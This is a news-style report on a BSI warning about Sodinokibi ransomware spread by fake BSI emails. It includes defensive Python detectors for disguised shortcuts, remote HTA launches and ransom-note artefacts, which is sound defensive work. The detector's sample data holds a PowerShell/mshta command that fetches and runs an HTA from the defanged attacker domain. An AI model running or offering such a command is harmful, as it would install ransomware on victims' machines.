Germany's federal cyber-security agency, the BSI, has issued a warning that attackers are distributing the Sodinokibi ransomware through emails disguised as official BSI notices. The emails carry a zip attachment containing a Windows shortcut (.lnk) made to look like a PDF file; opening the shortcut starts the infection.
Once executed, the shortcut runs a PowerShell command that launches a remote HTA file (HTML application) from http://grouphk[.]xyz/out-1308780833.hta; the command does little more than pass the URL of the HTA payload to the launcher.
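The delivery chain described above (a shortcut with a document-like double extension inside a zip, followed by PowerShell fetching a remote .hta) leaves two artefacts a defender can check for: the archive listing and the process command line. The following is an added example, not code from the BSI advisory or from any vendor tool; the zip contents and command lines are constructed samples, and the .lnk bytes are a placeholder rather than a real shortcut.

```python
import io
import re
import zipfile
from typing import List, Optional

# Constructed sample attachment: a zip carrying a shortcut whose name mimics
# a PDF via a double extension. The .lnk body is a placeholder; only the
# archive listing is inspected.
def build_sample_zip() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("BSI-Warnung.pdf.lnk", b"placeholder shortcut bytes")
        zf.writestr("readme.txt", b"harmless text")
    return buf.getvalue()

# A .lnk whose name ends in a document extension followed by .lnk is the
# "shortcut disguised as a PDF" pattern from the advisory.
DISGUISED_LNK = re.compile(
    r"\.(pdf|doc|docx|xls|xlsx|txt|jpg|png)\.lnk$", re.IGNORECASE
)

def find_disguised_shortcuts(zip_bytes: bytes) -> List[str]:
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [n for n in zf.namelist() if DISGUISED_LNK.search(n)]

# Command-line heuristic for the second stage: a script or HTA host whose
# arguments reference a remote .hta file.
HTA_URL = re.compile(r"https?://[^\s'\"]+\.hta\b", re.IGNORECASE)
LAUNCHERS = ("powershell.exe", "pwsh.exe", "mshta.exe")

def flag_hta_launch(command_line: str) -> Optional[dict]:
    lowered = command_line.lower()
    launcher = next((l for l in LAUNCHERS if l in lowered), None)
    if launcher is None:
        return None
    m = HTA_URL.search(command_line)
    if not m:
        return None                      # local .hta or no .hta at all
    return {"launcher": launcher, "hta_url": m.group(0)}

# Constructed process-creation command lines; the defanged URL is the one
# named in the advisory, the others are benign noise.
SAMPLE_CMDLINES = [
    'powershell.exe -w hidden -c "mshta http://grouphk[.]xyz/out-1308780833.hta"',
    "powershell.exe -NoProfile -Command Get-Process",
    "notepad.exe C:\\Users\\user\\HOW-TO-DECRYPT.txt",
]

def scan_cmdlines(lines):
    return [(line, hit) for line in lines if (hit := flag_hta_launch(line))]

if __name__ == "__main__":
    print("disguised shortcuts:", find_disguised_shortcuts(build_sample_zip()))
    for line, hit in scan_cmdlines(SAMPLE_CMDLINES):
        print("HTA launch:", hit, "<-", line)
```

The archive check works on mail-gateway or sandbox output before anything is opened; the command-line check is the kind of rule an EDR or Sysmon pipeline would apply to process-creation events, and it deliberately ignores .hta files opened from local paths to keep false positives down.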
According to the BSI, the Sodinokibi payload (also known as REvil and Sodin) is downloaded from the same domain that hosts the HTA file. Once running, Sodinokibi encrypts the victim's files and appends a random extension that is unique to each infected computer. It also drops a text ransom note named “HOW-TO-DECRYPT.txt” in every folder, containing payment instructions and a link to the payment website.
Victims are asked to pay $2,500 in bitcoin; if the ransom is not paid within two days, the amount doubles. The ransom page also shows the bitcoin address to be used for payment.
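The post-encryption behaviour described above (one note name repeated across folders, plus many user files sharing an extension that was never there before) is visible from a plain directory listing. The following is an added example, not code from the advisory or any vendor product; the file paths, the random extension `.7k2pq9` and the list of "known" extensions are constructed for illustration.

```python
import os
from collections import Counter

RANSOM_NOTE = "HOW-TO-DECRYPT.txt"   # note name reported by the BSI
# Constructed baseline of extensions normally seen on this host.
KNOWN_EXTS = {".txt", ".pdf", ".docx", ".xlsx", ".jpg", ".png",
              ".lnk", ".exe", ".dll", ".sys"}

# Constructed listing standing in for os.walk output after an infection:
# every user folder carries the note and data files gained a random suffix.
SAMPLE_PATHS = [
    "C:/Users/u/Documents/HOW-TO-DECRYPT.txt",
    "C:/Users/u/Documents/report.docx.7k2pq9",
    "C:/Users/u/Documents/budget.xlsx.7k2pq9",
    "C:/Users/u/Pictures/HOW-TO-DECRYPT.txt",
    "C:/Users/u/Pictures/holiday.jpg.7k2pq9",
    "C:/Windows/System32/kernel32.dll",
]

def assess(paths, min_note_dirs=2, min_files=3):
    """Return indicators of a Sodinokibi-style encryption run in a listing."""
    note_dirs = {os.path.dirname(p) for p in paths
                 if os.path.basename(p) == RANSOM_NOTE}
    # Extension of each path; for "report.docx.7k2pq9" this is ".7k2pq9".
    ext_counts = Counter(os.path.splitext(p)[1].lower() for p in paths)
    unknown = {e: c for e, c in ext_counts.items() if e and e not in KNOWN_EXTS}
    suspect_ext, count = max(unknown.items(), key=lambda kv: kv[1],
                             default=(None, 0))
    verdict = len(note_dirs) >= min_note_dirs and count >= min_files
    return {
        "note_dirs": sorted(note_dirs),
        "suspect_ext": suspect_ext,
        "files_with_ext": count,
        "likely_sodinokibi": verdict,
    }

if __name__ == "__main__":
    print(assess(SAMPLE_PATHS))
```

Requiring both signals (the note in more than one folder and a cluster of files under a single unknown extension) avoids alerting on a stray text file or a single unusual download; in production the baseline of known extensions would come from an inventory of the host rather than a fixed set.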
Kaspersky has also observed Sodinokibi escalating its privileges on compromised machines by exploiting CVE-2018-8453, a vulnerability in the Win32k component present in Windows 7 through 10 and the corresponding Server editions.